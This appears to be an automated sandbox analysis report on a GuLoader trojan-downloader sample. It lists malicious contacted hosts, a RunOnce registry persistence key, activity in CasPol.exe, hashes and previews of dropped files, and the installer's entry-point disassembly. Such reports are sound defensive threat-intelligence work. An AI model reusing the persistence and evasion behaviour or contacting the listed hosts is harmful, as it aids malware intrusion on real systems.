http://creativecommons.org/ns# | SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37816912349.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.dr | false | | high
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
50.7.115.119 | artist151sh.com | United States | 174 | COGENT-174US | true
173.254.28.216 | mail.paralikgroup.com | United States | 46606 | UNIFIEDLAYER-AS-1US | true
                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                  Analysis ID:635379
Start date and time: 27/05/2022 20:54:20 (2022-05-27 20:54:20 +02:00)
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 13m 32s
                                  Hypervisor based Inspection enabled:false
                                  Report type:light
                                  Sample file name:SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe
                                  Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
                                  Run name:Suspected Instruction Hammering
Number of new started processes analysed:21
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.evad.winEXE@4/13@2/2
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HDC Information:
                                  • Successful, ratio: 36.8% (good quality ratio 36.3%)
                                  • Quality average: 87.9%
                                  • Quality standard deviation: 21.1%
                                  HCA Information:
                                  • Successful, ratio: 99%
                                  • Number of executed functions: 0
                                  • Number of non-executed functions: 0
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Adjust boot time
                                  • Enable AMSI
                                  • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe
                                  • TCP Packets have been reduced to 100
                                  • Excluded IPs from analysis (whitelisted): 51.124.57.242, 20.93.58.141
                                  • Excluded domains from analysis (whitelisted): wd-prod-cp-eu-north-3-fe.northeurope.cloudapp.azure.com, client.wns.windows.com, wdcpalt.microsoft.com, ctldl.windowsupdate.com, img-prod-cms-rt-microsoft-com.akamaized.net, wdcp.microsoft.com, arc.msn.com, wd-prod-cp.trafficmanager.net, wd-prod-cp-eu-west-3-fe.westeurope.cloudapp.azure.com
• Not all processes were analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
20:56:37 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\Toelike.exe
20:56:45 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\Toelike.exe
20:56:50 | API Interceptor | 2728x Sleep call for process: CasPol.exe modified
                                  No context
                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:modified
                                  Size (bytes):43
                                  Entropy (8bit):4.693479289485192
                                  Encrypted:false
                                  SSDEEP:3:JODb6MHIymy32ov:Jebozyn
                                  MD5:8B36E2227A5BD0472C64194B43581D90
                                  SHA1:E391FCABCE78C902A95B2B3A90F46380AA0E6031
                                  SHA-256:7A5D1B27408729909236B8B98CD3D19002750B7297981F32A6E6DD743B16BFB4
                                  SHA-512:FE426325981C65C37C16AE8021B2D8EDB50009743DC54C3EA2F496CA020BB980BCC43D70F5A2498A2AB8315183F5D2437DB72CCE69698978D927FA0E25DB1375
                                  Malicious:false
                                  Reputation:low
                                  Preview:[Vddelber60]..Paxilla=EKSKOMMUNIKATIONERS..
                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe
                                  File Type:HTML document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):1245
                                  Entropy (8bit):5.462849750105637
                                  Encrypted:false
                                  SSDEEP:24:hM0mIAvy4Wvsqs1Ra7JZRGNeHX+AYcvP2wk1RjdEF3qpMk5:lmIAq1UqsziJZ+eHX+AdP2TvpMk5
                                  MD5:5343C1A8B203C162A3BF3870D9F50FD4
                                  SHA1:04B5B886C20D88B57EEA6D8FF882624A4AC1E51D
                                  SHA-256:DC1D54DAB6EC8C00F70137927504E4F222C8395F10760B6BEECFCFA94E08249F
                                  SHA-512:E0F50ACB6061744E825A4051765CEBF23E8C489B55B190739409D8A79BB08DAC8F919247A4E5F65A015EA9C57D326BBEF7EA045163915129E01F316C4958D949
                                  Malicious:false
                                  Reputation:moderate, very likely benign file
                                  Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">.. ..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="co
                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):40
                                  Entropy (8bit):4.412814895472355
                                  Encrypted:false
                                  SSDEEP:3:bAL2Wlv3AhWuvU2:bu2gYEd2
                                  MD5:176F3A8631F14F0421935D07502B8CD9
                                  SHA1:70C91B54BDE9BA107AB322ECACF16C60E0D8E57B
                                  SHA-256:F507F6BB14F286DD6835A18FC9ECDB86F73DBA96E9E281D626718447F1C496BB
                                  SHA-512:CC963E6BD3577D12FAC185D3D61CCC72098C52E5F2E907E5724BA7BC9FF022A2E74D0DF18D82AD7EC645FEE9328458B7493B1BDD7F1216A677A42F8516568336
                                  Malicious:false
                                  Reputation:low
                                  Preview:[Godgrendes]..Resipiscence=Mightily197..
                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe
                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):380640
                                  Entropy (8bit):6.00755593352656
                                  Encrypted:false
                                  SSDEEP:6144:tqpZKqQPNb5tPcACMBdK99Uf2o7nypI83l4tHY1706ePrz2lxf:tqEvcA49Ro7R64Pi
                                  MD5:07B4E869E84B557512EE38A5C283FEF3
                                  SHA1:85AFD748ACB7DB97C763ABFEA292E8543B084517
                                  SHA-256:C718B6BF9A427A117FFC1AB1C0E02551AFB2675406BAC625534E02179DB12C9D
                                  SHA-512:C1E7E9781B538D6FD1265DF135606483DCC80B190FFB6DE6C9A7C4DD83B2B4453C746FE7C4E4AE577BE5DD40D4BB98BE8D0325119148D81D8D3CD094E92606E7
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Reputation:low
                                  Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........EK..+...+...+......+...*...+.......+.../...+...(...+.$.*...+...,...+...-...+...*...+...*...+.$.....+.$.+...+.$.....+.......+.$.)...+.Rich..+.........................PE..d...W6;a.........." .........2......$y....................................... .......P....`.........................................pK..T....K..0.......p........!......................T......................(......................h............................text...<........................... ..`.rdata.. ...........................@..@.data....%...........~..............@....pdata...!......."..................@..@.rsrc...p...........................@..@.reloc..............................@..B........................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe
                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                  Category:dropped
                                  Size (bytes):685
                                  Entropy (8bit):7.621282940093077
                                  Encrypted:false
                                  SSDEEP:12:6v/7U+KyobNKxqUPO9/qRw6l2ZK2zirFLDbFJXy+MAg+eElsD8itXaBdHjGGrOKF:N+KyobksUVRqK2+LX/zlsYR3HjGCbx
                                  MD5:8C4F73C63672801A4629BA32BFAF9E31
                                  SHA1:C59877FEA56A2D45E36389366B0CCBC0AC2B720B
                                  SHA-256:DFAFC0CCDCD4A2B74B8F74ECBE0BE82FC9FF3D055A8C9585DD78379DB7F01063
                                  SHA-512:E4479DFE6F342212DA86B0B4BE1095162F07F7AE98AC1921CC9ED7BB650E7024CF80D1A82EA99D3744C9127FA046E82C81D4D82D17152D868DD7D1D78ACE20E5
                                  Malicious:false
                                  Preview:.PNG........IHDR................a...tIDATx.....ki.G.....pm.........c.m.v.....uNr...O......"....\.B.......q.J......|.^^^......g....6..^..NV(..../.wAIi.n.,,.....A~k....5....YwdS.........O/.s.9.k..|v.d......<F.F......z.9 CDn.IzeS.^.w.).V.0.?.._.-.........p?......A.KV..}r...M......<..p......h.hEGg+.Z.$.jx7}LN....,....+...`..-N.6.8....T.T.r.zH.?...@.X...L......fgg..{...........EQq....n.G..{65<.cD)d>.c..V}r.>z.S.D"...[.p.M.4>|.3|..7..j8:.@..5.s.P...N..P..Vi8..<3.g.5...hO..-d..Z.,..........A.Yc..3.5|.Nk.......I.7.*..a..x....2R......sn..0..2...o....Q.)<A..M......%`....P...Q.w. ..G.ggr.F..O5.`.5.(g...7......3l.-d..,..1F..[t.l9.g..FX........IEND.B`.
                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe
                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                  Category:dropped
                                  Size (bytes):166
                                  Entropy (8bit):5.876785121167948
                                  Encrypted:false
                                  SSDEEP:3:yionv//thPl9vt3lAnsrtxBllZMFnt4UoEw2GUqcklEj9h0XGqV/maXyj2fllljp:6v/lhPysLEnt4UoEwsqckGpq6jy/jp
                                  MD5:A008C1D205C5B08639C0A8D8673C6C72
                                  SHA1:5190570B97A6F75F1D10D3D1EC6E46AEC8705B0B
                                  SHA-256:54A3EBAD22462339574D87D835CA626E039E9B38A625806BAA051F80A327C428
                                  SHA-512:AC5F3ED7773C04223650B757F6168FA4F6C57BA4F0C073BD5AB933B96F0FC3AEE918543C4AEA703A9F472045C6FC5CEA012935850F2971A8107772B96F341AB5
                                  Malicious:false
                                  Preview:.PNG........IHDR................a....sBIT....|.d....]IDAT8.c`..8......>... F...4..u...IJ.....43B.......!..X.D.&rl.5...<...IPO......R..3...W......o2...M`....IEND.B`.
                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):12288
                                  Entropy (8bit):5.814115788739565
                                  Encrypted:false
                                  SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                                  MD5:CFF85C549D536F651D4FB8387F1976F2
                                  SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                                  SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                                  SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                                  Malicious:false
                                  Antivirus:
• Antivirus: Metadefender, Detection: 3%
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe
                                  File Type:Windows setup INFormation, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):1292652
                                  Entropy (8bit):3.864768543104337
                                  Encrypted:false
                                  SSDEEP:3072:veHaqq95T1TpRKkYxyZuSkIRipOp1MbSqh43FFc23lRxSsopQfql1Ody29kn1jYF:XaekadZaJiaeQMV
                                  MD5:2D947C4C9147622CFC588FC5C17DDDEC
                                  SHA1:B367B48D1282E39E37B8992615FF9947DEE8CFED
                                  SHA-256:EBB8155AC71DD53258CE3772F189B4771272BA55E15A6DABDE2BEA6896DC2CC3
                                  SHA-512:3213B423153A1350AA3A0213079EDF21D77022C7839EB3A905F7EE8A02028E6A572499223889A55C2EF4646C0D3B2CB6DC64E1DCCEF26053EF80D34313EAD885
                                  Malicious:false
                                  Preview:..;. .*.*. .C.O.P.Y.R.I.G.H.T. .(.C.). .2.0.0.7.-.2.0.1.3. .R.e.a.l.t.e.k. .C.O.R.P.O.R.A.T.I.O.N.....;.....;. .R.e.a.l.t.e.k. .P.C.I.e. .F.E. .F.a.m.i.l.y. .C.o.n.t.r.o.l.l.e.r.....;. .R.e.a.l.t.e.k. .P.C.I. .G.B.E. .F.a.m.i.l.y. .C.o.n.t.r.o.l.l.e.r.....;. .R.e.a.l.t.e.k. .P.C.I.e. .G.B.E. .F.a.m.i.l.y. .C.o.n.t.r.o.l.l.e.r.....;.........[.v.e.r.s.i.o.n.].....S.i.g.n.a.t.u.r.e. . . .=. .".$.W.i.n.d.o.w.s. .N.T.$.".....C.l.a.s.s. . . . . . . .=. .N.e.t.....C.l.a.s.s.G.U.I.D. . . .=. .{.4.d.3.6.e.9.7.2.-.e.3.2.5.-.1.1.c.e.-.b.f.c.1.-.0.8.0.0.2.b.e.1.0.3.1.8.}.....P.r.o.v.i.d.e.r. . . . .=. .%.R.e.a.l.t.e.k.%.....D.r.i.v.e.r.V.e.r. . . .=. .0.4./.1.0./.2.0.1.3.,.7...0.7.2...0.4.1.0...2.0.1.3.....C.a.t.a.l.o.g.F.i.l.e...N.T. .=. .r.t.6.4.w.i.n.7...c.a.t.........[.M.a.n.u.f.a.c.t.u.r.e.r.].....%.R.e.a.l.t.e.k.%.=.R.e.a.l.t.e.k.,. .N.T.a.m.d.6.4.........[.C.o.n.t.r.o.l.F.l.a.g.s.].....E.x.c.l.u.d.e.F.r.o.m.S.e.l.e.c.t. . . . . .=. .*.............[.R.e.a.l.t.e.k...N.T.a.m.d.6.4.].....;. .8.
                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):657569
                                  Entropy (8bit):6.792168991473304
                                  Encrypted:false
                                  SSDEEP:12288:rYgT387AbTc/v4b0h2gdYBXnQLGT/Fp0hZAvcG0ePzNSd01RHqtZCCNfn6THbMcQ:rYgo7AbTc/v4b0h2gqBXnQLGT/Fp0hZf
                                  MD5:34770A449DF27F8C114F7CDCBA217401
                                  SHA1:D6DCEFE169654BF62ED52365464EE948BE8BA461
                                  SHA-256:493381B41D8AFFB72163066BBD9C7C6345AF043E0541E5E344F79CE6B688A536
                                  SHA-512:6D57E22882F3596CE11F6D4FE6B81FADD71DBEACF6EBD2A5AD7CE64498BE0196417E32FC8933231BCA3F3155679BFD2097037EE74C988EC55B7C6F5529F1C977
                                  Malicious:false
                                  Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*......@6............@..........................`............@.......................................... ..8=...........................................................................................................text...vf.......h.................. ..`.rdata...............l..............@..@.data...x...........................@....ndata...p...............................rsrc...8=... ...>..................@..@................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):133595
                                  Entropy (8bit):4.03243313791291
                                  Encrypted:false
                                  SSDEEP:1536:VB1BsBB19p0QL7WhuipXeuA+OFq7g+1UhUk8Uhq:VBwj1b0QLqXepET1CFxhq
                                  MD5:0754E785FF6ECE6969E175C9B13C6FE1
                                  SHA1:A03D91669F72C2D8EEC2B86EB6490D6D6BA1A92B
                                  SHA-256:F73CE6049A569409CA192ACD4E36766FA427FB2EF79D15F66DC870A4D04E2713
                                  SHA-512:B386FCBBABFCC55A965722786A60811DCDBB83103A235E01C5889D1C03B6C8A83288D19F4BCC9F5A69D45B5D4B28708D4EC08D043AF7417DD9D18AD88EF3509A
                                  Malicious:false
                                  Preview:}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe
                                  File Type:SVG Scalable Vector Graphics image
                                  Category:dropped
                                  Size (bytes):4730
                                  Entropy (8bit):4.970880293743837
                                  Encrypted:false
                                  SSDEEP:96:VkoIankPYfLoIJomlXTlUxSHtuubQLqJlm0mxmOmTGmVm/mYmY:VkfcMI64RfIubQW/BEjPoKlp
                                  MD5:8F7C767AFA41E6D03BDE59296DFF8175
                                  SHA1:EEFA541D3A06CAFEB62A535B86D1A95D6AAE1CD6
                                  SHA-256:292770B23ED69AF4EDE9255BB66ADF3D3A0FF62D827D2BA05ED2C44A57228ED6
                                  SHA-512:FFE75CCD2EFFA74E24955BF36DBD86BB1B30F880D233D8F5C5431E99169224E89E7C59FDD052C6F9544E05CF11FD425F01ADD6E87B512C318132D963CB338B04
                                  Malicious:false
                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>.<svg. xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:cc="http://creativecommons.org/ns#". xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#". xmlns:svg="http://www.w3.org/2000/svg". xmlns="http://www.w3.org/2000/svg". width="16". version="1.1". style="enable-background:new". id="svg7384". height="16.000645">. <metadata. id="metadata90">. <rdf:RDF>. <cc:Work. rdf:about="">. <dc:format>image/svg+xml</dc:format>. <dc:type. rdf:resource="http://purl.org/dc/dcmitype/StillImage" />. <dc:title>Gnome Symbolic Icons</dc:title>. <cc:license. rdf:resource="http://creativecommons.org/licenses/by-sa/4.0/" />. </cc:Work>. <cc:License. rdf:about="http://creativecommons.org/licenses/by-sa/4.0/">. <cc:permits. rdf:resource="http://creativecommons.org/ns#Reproduction" />. <cc:permits. rdf:resource="htt
                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe
                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                  Category:dropped
                                  Size (bytes):208
                                  Entropy (8bit):6.572781220141588
                                  Encrypted:false
                                  SSDEEP:3:yionv//thPl9vt3lAnsrtxBllUxPFp/7l04sR5/7dY+MK6Ie+ed0oxIwsoazRC4I:6v/lhPysIzlZsfdY+MKda8RC4KymCeVp
                                  MD5:E2FC23D36F5488D1F2888D524F933582
                                  SHA1:335CA8F69FF42E4418F0C95A9626F7B027F62139
                                  SHA-256:07AEFFEAC02CD1501C54E5D66ED1816B83AF04E51B1676AF3C4A538FDC9E9E4A
                                  SHA-512:EA3B15A24F8B3FF83DE6ABB7392A0672A55F1F87DDC485B2AD517E76B48358C852484CF2D23FD7989992676AF73640D6CC2002FD2F0FD2EAA29C39C7DFE503BA
                                  Malicious:false
                                  Preview:.PNG........IHDR................a....sBIT....|.d.....IDAT8..1.. .E..@v....P...........8.O.......w4@.8`..I.I....0...&y..../9..r....5..@....P.+..l..*..8..~...@....p...y.#0)....o...fq....>....S.^&.n....IEND.B`.
                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):30
                                  Entropy (8bit):3.964735178725505
                                  Encrypted:false
                                  SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                                  MD5:9F754B47B351EF0FC32527B541420595
                                  SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                                  SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                                  SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                                  Malicious:false
                                  Preview:NordVPN directory not found!..
                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                  Entropy (8bit):6.792177380489411
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe
                                  File size:657569
                                  MD5:e2e4196b84fdf8956baa7f99b11812af
                                  SHA1:7af0382928364f2fc088d13f96394f4d83bd01ae
                                  SHA256:7004d20bac532e4a93f138bae6da90223d850992fd1c88ba176bc9349b802c6a
                                  SHA512:6aa569bb72d22756c0d3a546ed2b8c9e319605dc1421d6da14a95291b5cc0ad390ed7dc8bb63efde83aa80bd82bd0a321d1f7245c7145050f72db04a2a93a06c
                                  SSDEEP:12288:0YgT387AbTc/v4b0h2gdYBXnQLGT/Fp0hZAvcG0ePzNSd01RHqtZCCNfn6THbMcQ:0Ygo7AbTc/v4b0h2gqBXnQLGT/Fp0hZf
                                  TLSH:45E429B2A430868AD5E91EB25E4AB93091B22D7CDCE2110DA9F6370DD6F231145DFB4F
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*.....
                                  Icon Hash:ac9eb23233b28eaa
                                  Entrypoint:0x403640
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                  Time Stamp:0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:61259b55b8912888e90f516ca08dc514
Instruction (entry-point disassembly at 0x403640; the first call, with 0x8001 pushed, is the SetErrorMode(SEM_FAILCRITICALERRORS | SEM_NOOPENFILEERRORBOX) that opens the NSIS stub, and the 0x11C and 0x114 values stored at [ebp-140h] before each call through esi are sizeof(OSVERSIONINFOEXW) and sizeof(OSVERSIONINFOW), i.e. the stub's GetVersionExW probe; both functions appear in the KERNEL32.dll import list below)
                                  push ebp
                                  mov ebp, esp
                                  sub esp, 000003F4h
                                  push ebx
                                  push esi
                                  push edi
                                  push 00000020h
                                  pop edi
                                  xor ebx, ebx
                                  push 00008001h
                                  mov dword ptr [ebp-14h], ebx
                                  mov dword ptr [ebp-04h], 0040A230h
                                  mov dword ptr [ebp-10h], ebx
                                  call dword ptr [004080C8h]
                                  mov esi, dword ptr [004080CCh]
                                  lea eax, dword ptr [ebp-00000140h]
                                  push eax
                                  mov dword ptr [ebp-0000012Ch], ebx
                                  mov dword ptr [ebp-2Ch], ebx
                                  mov dword ptr [ebp-28h], ebx
                                  mov dword ptr [ebp-00000140h], 0000011Ch
                                  call esi
                                  test eax, eax
                                  jne 00007FBE745493FAh
                                  lea eax, dword ptr [ebp-00000140h]
                                  mov dword ptr [ebp-00000140h], 00000114h
                                  push eax
                                  call esi
                                  mov ax, word ptr [ebp-0000012Ch]
                                  mov ecx, dword ptr [ebp-00000112h]
                                  sub ax, 00000053h
                                  add ecx, FFFFFFD0h
                                  neg ax
                                  sbb eax, eax
                                  mov byte ptr [ebp-26h], 00000004h
                                  not eax
                                  and eax, ecx
                                  mov word ptr [ebp-2Ch], ax
                                  cmp dword ptr [ebp-0000013Ch], 0Ah
                                  jnc 00007FBE745493CAh
                                  and word ptr [ebp-00000132h], 0000h
                                  mov eax, dword ptr [ebp-00000134h]
                                  movzx ecx, byte ptr [ebp-00000138h]
                                  mov dword ptr [0042A318h], eax
                                  xor eax, eax
                                  mov ah, byte ptr [ebp-0000013Ch]
                                  movzx eax, ax
                                  or eax, ecx
                                  xor ecx, ecx
                                  mov ch, byte ptr [ebp-2Ch]
                                  movzx ecx, cx
                                  shl eax, 10h
                                  or eax, ecx
                                  Programming Language:
                                  • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8504 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x52000 | 0x63d38 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
